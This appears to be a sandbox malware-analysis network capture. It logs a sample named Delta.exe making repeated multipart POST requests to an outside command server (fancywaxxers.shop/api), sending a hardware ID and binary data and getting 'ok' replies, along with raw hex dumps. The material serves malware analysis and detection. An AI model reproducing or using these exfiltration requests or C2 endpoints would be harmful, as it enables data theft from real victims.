                                                                                        2024-12-31 16:21:16 UTC1369INData Raw: 74 71 73 51 54 4d 31 44 6e 6e 72 6e 7a 49 54 36 53 46 58 6a 72 36 48 7a 77 51 68 36 43 6a 30 6c 70 55 35 36 71 49 66 4d 51 72 58 68 72 55 4e 4a 6a 56 45 4a 36 53 66 50 31 75 68 63 31 2b 62 2f 64 47 42 49 53 66 7a 49 2f 37 55 72 54 2f 67 70 78 4d 6b 52 38 7a 61 70 6b 30 70 50 41 56 31 37 74 4a 77 45 36 42 35 45 4d 36 2b 37 70 67 6c 59 4d 6b 6f 38 4e 71 6e 4c 4b 53 7a 56 6a 34 4b 7a 38 54 73 46 57 45 30 44 48 72 68 6e 54 39 5a 71 57 52 61 6d 76 62 52 6a 44 77 74 2b 43 76 79 33 4b 6f 33 36 71 67 51 4c 6b 48 44 7a 71 78 4d 4b 33 6c 4b 50 2b 4f 4b 66 67 76 6e 56 56 65 61 38 39 44 4e 47 79 48 79 4a 66 6e 43 34 43 57 71 74 56 67 67 52 6f 69 51 37 45 45 6f 4f 51 39 31 34 4a 49 35 58 71 4a 69 56 35 58 7a 32 49 55 67 4a 66 67 6e 39 39 6d 6d 4f 75 4f 6f 48 54 56 50
                                                                                        Data Ascii: tqsQTM1DnnrnzIT6SFXjr6HzwQh6Cj0lpU56qIfMQrXhrUNJjVEJ6SfP1uhc1+b/dGBISfzI/7UrT/gpxMkR8zapk0pPAV17tJwE6B5EM6+7pglYMko8NqnLKSzVj4Kz8TsFWE0DHrhnT9ZqWRamvbRjDwt+Cvy3Ko36qgQLkHDzqxMK3lKP+OKfgvnVVea89DNGyHyJfnC4CWqtVggRoiQ7EEoOQ914JI5XqJiV5Xz2IUgJfgn99mmOuOoHTVP
                                                                                        2024-12-31 16:21:16 UTC1369INData Raw: 59 55 4e 78 49 2f 2b 39 77 6e 45 36 42 74 45 4d 36 2b 31 6f 59 38 4c 50 49 69 38 39 4b 6f 50 65 71 68 45 79 46 42 7a 38 2b 71 51 43 6b 30 41 58 7a 6c 6c 6a 52 42 70 47 70 61 6d 2f 53 66 77 57 34 6c 35 47 75 6d 6c 49 63 32 7a 62 77 44 4e 56 79 49 31 2b 4a 55 59 54 34 49 50 37 7a 53 50 56 79 75 62 6c 69 65 38 64 43 4c 49 43 54 36 4a 76 76 62 71 69 6a 73 6f 68 55 73 52 63 50 61 72 45 41 6c 4e 51 42 33 37 35 68 2b 48 65 64 6d 53 4e 61 6d 6e 37 6f 6a 4c 66 77 6f 36 4a 53 2f 64 50 33 73 48 79 73 4b 6b 49 69 67 51 79 45 32 43 48 50 76 6d 6a 39 66 71 57 5a 56 6e 2f 62 58 6e 53 38 6d 39 43 72 77 32 36 45 2b 34 61 6b 63 49 45 37 4f 78 2b 77 44 59 54 34 63 50 37 7a 53 45 58 53 53 49 33 47 73 76 73 44 42 4e 32 4c 37 4a 37 36 4d 34 44 62 6e 6f 42 41 6f 54 4d 48 45 70
                                                                                        Data Ascii: YUNxI/+9wnE6BtEM6+1oY8LPIi89KoPeqhEyFBz8+qQCk0AXzlljRBpGpam/SfwW4l5GumlIc2zbwDNVyI1+JUYT4IP7zSPVyublie8dCLICT6JvvbqijsohUsRcParEAlNQB375h+HedmSNamn7ojLfwo6JS/dP3sHysKkIigQyE2CHPvmj9fqWZVn/bXnS8m9Crw26E+4akcIE7Ox+wDYT4cP7zSEXSSI3GsvsDBN2L7J76M4DbnoBAoTMHEp
                                                                                        2024-12-31 16:21:16 UTC1369INData Raw: 4f 64 4f 43 52 4f 6c 61 6f 59 46 47 51 37 4e 69 47 50 43 7a 78 4a 50 62 63 71 54 76 67 71 52 55 68 52 73 4c 4a 71 30 4d 76 4d 55 51 78 70 4a 55 6d 45 2f 38 68 63 59 62 6c 7a 5a 6b 6a 41 2f 45 6b 76 73 76 75 49 36 53 72 46 47 63 53 69 4d 47 2b 53 53 77 72 44 58 6a 71 6e 54 31 42 70 6d 78 62 68 50 6e 51 69 79 6b 75 2b 69 54 34 31 61 55 77 36 4b 73 64 4c 45 58 45 69 4f 49 4e 4a 69 46 45 4a 36 53 38 4e 55 43 77 59 6c 36 64 36 4d 54 50 4d 57 7a 6c 61 2f 6e 59 34 47 4b 6b 72 78 4d 73 54 73 6a 45 72 45 6b 73 4f 52 5a 77 34 35 55 33 57 4c 56 72 56 35 48 31 31 34 51 68 4a 4f 34 6e 38 4d 61 6c 4b 50 62 73 56 6d 64 4e 30 49 6a 30 44 52 63 2b 46 47 2f 6e 30 41 39 46 70 48 64 62 6d 2f 4b 66 6b 47 41 37 76 43 7a 79 6c 50 68 36 34 71 4d 52 4a 45 58 4a 77 61 42 41 4a 44
                                                                                        Data Ascii: OdOCROlaoYFGQ7NiGPCzxJPbcqTvgqRUhRsLJq0MvMUQxpJUmE/8hcYblzZkjA/EkvsvuI6SrFGcSiMG+SSwrDXjqnT1BpmxbhPnQiyku+iT41aUw6KsdLEXEiOINJiFEJ6S8NUCwYl6d6MTPMWzla/nY4GKkrxMsTsjErEksORZw45U3WLVrV5H114QhJO4n8MalKPbsVmdN0Ij0DRc+FG/n0A9FpHdbm/KfkGA7vCzylPh64qMRJEXJwaBAJD
                                                                                        2024-12-31 16:21:16 UTC1369INData Raw: 71 6a 56 64 6c 57 4a 4c 31 75 47 52 6c 6d 34 6c 38 47 75 6d 6c 4b 4d 39 35 36 30 53 4c 6b 62 48 7a 36 68 66 4b 7a 34 57 66 75 57 5a 4d 31 2b 6e 62 46 32 63 2f 39 61 43 49 69 2f 37 4c 50 48 52 34 48 53 6b 71 77 42 6e 45 6f 6a 70 6f 55 59 74 59 6c 34 2f 2b 39 77 6e 45 36 42 74 45 4d 36 2b 33 34 55 72 4b 50 45 6f 38 64 65 79 4f 2b 4b 2b 47 43 70 41 32 73 4b 6e 53 43 77 30 43 58 7a 69 6c 44 56 66 74 57 68 51 6c 66 57 66 77 57 34 6c 35 47 75 6d 6c 49 4d 74 38 71 59 66 4b 31 7a 44 79 61 39 62 4c 43 6c 45 4d 61 53 44 4f 55 4c 6e 4f 55 61 47 36 64 69 51 59 44 75 38 4c 50 4b 55 2b 48 72 69 70 52 34 67 54 4d 62 61 71 55 73 75 4e 67 31 32 34 4a 6f 39 55 36 4e 6c 56 35 50 39 30 34 51 70 49 66 4d 76 39 39 71 70 4e 61 54 69 57 43 42 53 69 4a 44 73 62 44 6f 36 43 48 4b
                                                                                        Data Ascii: qjVdlWJL1uGRlm4l8GumlKM9560SLkbHz6hfKz4WfuWZM1+nbF2c/9aCIi/7LPHR4HSkqwBnEojpoUYtYl4/+9wnE6BtEM6+34UrKPEo8deyO+K+GCpA2sKnSCw0CXzilDVftWhQlfWfwW4l5GumlIMt8qYfK1zDya9bLClEMaSDOULnOUaG6diQYDu8LPKU+HripR4gTMbaqUsuNg124Jo9U6NlV5P904QpIfMv99qpNaTiWCBSiJDsbDo6CHK
                                                                                        2024-12-31 16:21:16 UTC268INData Raw: 4b 34 68 48 74 62 35 78 38 39 32 59 74 77 67 36 4e 47 6e 4c 4b 61 5a 47 79 6c 45 7a 39 37 73 55 68 35 33 52 48 44 2b 30 6d 5a 71 76 69 46 58 6d 72 36 48 7a 7a 73 6c 2f 43 7a 6b 77 71 63 32 39 61 63 56 4b 32 6a 48 7a 37 70 4f 4c 6a 6f 56 64 71 69 5a 4d 78 50 70 49 56 65 4f 76 6f 66 50 41 53 58 71 4b 4e 48 58 73 54 4f 6b 34 6c 67 67 58 49 69 51 37 48 4e 68 4b 77 64 76 35 35 30 76 62 65 63 35 53 61 69 2b 31 4a 6b 70 4d 76 38 39 39 64 6d 73 4b 39 72 73 51 48 4d 59 6d 70 72 2b 48 7a 35 35 47 30 43 71 30 6a 38 54 2f 31 68 4a 31 75 69 66 31 33 78 73 76 44 6d 2b 6a 4f 42 39 35 37 34 4b 49 55 6e 65 79 2b 74 7a 48 78 34 53 64 65 4f 43 4f 55 53 6f 49 52 37 57 38 5a 2f 58 46 32 4c 31 4c 4f 58 46 74 6a 66 30 71 31 67 59 42 49 6a 51 37 42 56 68 44 41 64 78 36 70 55 6f
                                                                                        Data Ascii: K4hHtb5x892Ytwg6NGnLKaZGylEz97sUh53RHD+0mZqviFXmr6Hzzsl/Czkwqc29acVK2jHz7pOLjoVdqiZMxPpIVeOvofPASXqKNHXsTOk4lggXIiQ7HNhKwdv550vbec5Sai+1JkpMv899dmsK9rsQHMYmpr+Hz55G0Cq0j8T/1hJ1uif13xsvDm+jOB9574KIUney+tzHx4SdeOCOUSoIR7W8Z/XF2L1LOXFtjf0q1gYBIjQ7BVhDAdx6pUo
                                                                                        2024-12-31 16:21:16 UTC1369INData Raw: 32 63 65 39 0d 0a 35 4c 62 78 6c 76 74 4c 67 59 72 66 69 57 43 4e 62 69 4a 44 38 48 33 70 73 56 79 69 30 77 43 45 64 76 69 46 47 31 71 61 4e 77 57 34 77 76 48 4f 2b 6b 36 4d 6f 39 71 6f 62 4d 55 6d 50 39 70 4a 71 4f 7a 51 43 61 50 57 73 41 46 53 39 62 46 61 42 37 35 4f 61 4c 53 7a 79 4c 4f 69 55 37 6e 72 72 37 45 41 65 43 6f 43 49 6b 77 4e 68 49 55 51 6e 70 4b 63 39 58 61 6c 6d 52 6f 65 7a 2b 4a 55 6a 4a 4f 73 36 76 70 72 67 50 4b 54 30 53 6d 6b 4b 7a 4e 6e 73 46 58 46 72 58 79 71 33 78 57 34 42 75 43 39 4a 31 75 69 66 31 33 78 73 76 44 6d 2b 6a 4f 42 39 35 37 34 4b 49 55 6e 65 79 2b 74 7a 48 78 63 44 65 65 47 56 4c 68 47 4a 61 6b 53 52 76 70 48 50 49 57 4b 6b 45 72 36 63 34 41 57 71 37 41 42 6e 45 6f 6a 39 72 30 4d 76 50 68 4a 75 71 62 77 35 56 61 4a 6d
                                                                                        Data Ascii: 2ce95LbxlvtLgYrfiWCNbiJD8H3psVyi0wCEdviFG1qaNwW4wvHO+k6Mo9qobMUmP9pJqOzQCaPWsAFS9bFaB75OaLSzyLOiU7nrr7EAeCoCIkwNhIUQnpKc9XalmRoez+JUjJOs6vprgPKT0SmkKzNnsFXFrXyq3xW4BuC9J1uif13xsvDm+jOB9574KIUney+tzHxcDeeGVLhGJakSRvpHPIWKkEr6c4AWq7ABnEoj9r0MvPhJuqbw5VaJm
                                                                                        2024-12-31 16:21:16 UTC1369INData Raw: 33 50 64 6d 4b 37 4b 4f 7a 47 70 6a 6e 79 72 31 38 5a 64 4f 2f 47 71 30 77 33 4b 52 4e 77 32 71 77 72 55 4b 6c 76 56 34 44 76 6e 38 46 75 4c 62 78 7a 78 35 54 6f 65 74 76 69 57 44 38 4b 6b 49 69 5a 54 69 38 33 41 32 6e 31 33 78 6c 64 6f 47 42 47 68 75 6e 51 7a 32 42 69 2b 6d 75 6d 68 75 35 36 34 4c 31 59 66 78 71 61 6b 2f 6b 65 64 6d 6c 57 59 4b 71 4c 66 6b 58 6e 4f 51 4c 59 76 73 33 50 64 6d 4b 37 4b 4f 7a 47 70 6a 6e 79 72 31 38 5a 64 4f 2f 47 71 30 77 33 4b 52 4e 77 71 37 77 49 63 70 6c 66 52 5a 58 77 30 59 67 34 4d 37 78 6c 76 74 76 67 59 74 33 73 55 47 64 31 68 6f 69 30 44 58 6c 35 4d 58 7a 71 6e 44 6c 46 74 69 78 33 6d 50 6e 65 6d 54 34 31 38 32 54 51 34 6f 46 36 71 75 77 65 5a 78 4b 61 68 75 78 4a 4d 48 6c 63 4c 37 62 4a 61 77 44 77 4d 51 4b 4a 73
                                                                                        Data Ascii: 3PdmK7KOzGpjnyr18ZdO/Gq0w3KRNw2qwrUKlvV4Dvn8FuLbxzx5ToetviWD8KkIiZTi83A2n13xldoGBGhunQz2Bi+mumhu564L1Yfxqak/kedmlWYKqLfkXnOQLYvs3PdmK7KOzGpjnyr18ZdO/Gq0w3KRNwq7wIcplfRZXw0Yg4M7xlvtvgYt3sUGd1hoi0DXl5MXzqnDlFtix3mPnemT4182TQ4oF6quweZxKahuxJMHlcL7bJawDwMQKJs


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449732104.21.96.14437396C:\Users\user\Desktop\Delta.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:21:17 UTC279OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=Y1RVV8N9OI1NTO
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 18143
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:21:17 UTC15331OUTData Raw: 2d 2d 59 31 52 56 56 38 4e 39 4f 49 31 4e 54 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33 0d 0a 2d 2d 59 31 52 56 56 38 4e 39 4f 49 31 4e 54 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 31 52 56 56 38 4e 39 4f 49 31 4e 54 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 0d 0a 2d 2d 59 31 52 56
                                                                                        Data Ascii: --Y1RVV8N9OI1NTOContent-Disposition: form-data; name="hwid"0227F22DABB37DE680FC103CECFC3A13--Y1RVV8N9OI1NTOContent-Disposition: form-data; name="pid"2--Y1RVV8N9OI1NTOContent-Disposition: form-data; name="lid"yau6Na--914510980--Y1RV
                                                                                        2024-12-31 16:21:17 UTC2812OUTData Raw: cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f
                                                                                        Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
                                                                                        2024-12-31 16:21:17 UTC1139INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:21:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=j9bo1vttghhssh1dcef8gjnqrf; expires=Sat, 26 Apr 2025 10:07:56 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vr3MzMO%2FWaNiE2wzRF%2FV0kYLu9YNoiRtvgt2KfIOZrR%2BncP7bbHHss8Pt4lUQLNpgaVA3nBKLadOMRC5J4FxE%2BHjUhNr%2FEakEWb7jWr6kzmsCkVRoZ9L21Y8fr6%2FJlgVRca4hQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9a0e5aa11a48-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1993&rtt_var=754&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19102&delivery_rate=1446260&cwnd=157&unsent_bytes=0&cid=e0856b5389ae8d3d&ts=672&x=0"
                                                                                        2024-12-31 16:21:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:21:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449733104.21.96.14437396C:\Users\user\Desktop\Delta.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:21:18 UTC282OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=NF7LH923VBKDH6VCEB
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8788
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:21:18 UTC8788OUTData Raw: 2d 2d 4e 46 37 4c 48 39 32 33 56 42 4b 44 48 36 56 43 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33 0d 0a 2d 2d 4e 46 37 4c 48 39 32 33 56 42 4b 44 48 36 56 43 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 46 37 4c 48 39 32 33 56 42 4b 44 48 36 56 43 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31
                                                                                        Data Ascii: --NF7LH923VBKDH6VCEBContent-Disposition: form-data; name="hwid"0227F22DABB37DE680FC103CECFC3A13--NF7LH923VBKDH6VCEBContent-Disposition: form-data; name="pid"2--NF7LH923VBKDH6VCEBContent-Disposition: form-data; name="lid"yau6Na--91451
                                                                                        2024-12-31 16:21:18 UTC1132INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:21:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=gbk3qs8hkatp5jeso42el6f2gq; expires=Sat, 26 Apr 2025 10:07:57 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rxd%2BN7fNdZ22LS%2Bwbq5J9xYDaOGHGfdHkYoJ8s3hqxBpguHYCohvaTL0Rm5YK1LNEo5Xo3KcKvP%2BrVzlC7voHUrl5yP25nMxJ6VVxBeX08ILJ9CMXosr36YQXgPvgq9aY6e8Tw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9a1698f042c0-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1659&rtt_var=628&sent=10&recv=15&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9728&delivery_rate=1733966&cwnd=212&unsent_bytes=0&cid=91a0ed7cbbffbdb5&ts=583&x=0"
                                                                                        2024-12-31 16:21:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:21:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.449734104.21.96.14437396C:\Users\user\Desktop\Delta.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:21:19 UTC282OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=VRRPKLD6B8VDDDLB5
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 20435
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:21:19 UTC15331OUTData Raw: 2d 2d 56 52 52 50 4b 4c 44 36 42 38 56 44 44 44 4c 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33 0d 0a 2d 2d 56 52 52 50 4b 4c 44 36 42 38 56 44 44 44 4c 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 52 52 50 4b 4c 44 36 42 38 56 44 44 44 4c 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38
                                                                                        Data Ascii: --VRRPKLD6B8VDDDLB5Content-Disposition: form-data; name="hwid"0227F22DABB37DE680FC103CECFC3A13--VRRPKLD6B8VDDDLB5Content-Disposition: form-data; name="pid"3--VRRPKLD6B8VDDDLB5Content-Disposition: form-data; name="lid"yau6Na--91451098
                                                                                        2024-12-31 16:21:19 UTC5104OUTData Raw: 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00
                                                                                        Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                        2024-12-31 16:21:20 UTC1133INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:21:20 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=vteo4t62g144m3bidvrr1fkajl; expires=Sat, 26 Apr 2025 10:07:59 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SW6QPeI5vEBBGtQ2T%2FJ8tnFD0GzdviJ0ekZMXO1NDisOCvKbK7CwAVx5dH3frL%2Fah%2Fr8wnA6zNg1QuQB4RtLMaXU8KLTg3JlJoqXJw0yb4vJO4PuGCZxCtJO2CBtQI1VnM1ZoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fab9a1e0aa772a4-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2047&min_rtt=2045&rtt_var=771&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21397&delivery_rate=1415414&cwnd=212&unsent_bytes=0&cid=2f87fdd9de485db5&ts=680&x=0"
                                                                                        2024-12-31 16:21:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:21:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.449735104.21.96.14437396C:\Users\user\Desktop\Delta.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:21:21 UTC273OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=NOJU2OM03
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1210
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:21:21 UTC1210OUTData Raw: 2d 2d 4e 4f 4a 55 32 4f 4d 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33 0d 0a 2d 2d 4e 4f 4a 55 32 4f 4d 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 4f 4a 55 32 4f 4d 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 0d 0a 2d 2d 4e 4f 4a 55 32 4f 4d 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                        Data Ascii: --NOJU2OM03Content-Disposition: form-data; name="hwid"0227F22DABB37DE680FC103CECFC3A13--NOJU2OM03Content-Disposition: form-data; name="pid"1--NOJU2OM03Content-Disposition: form-data; name="lid"yau6Na--914510980--NOJU2OM03Content-
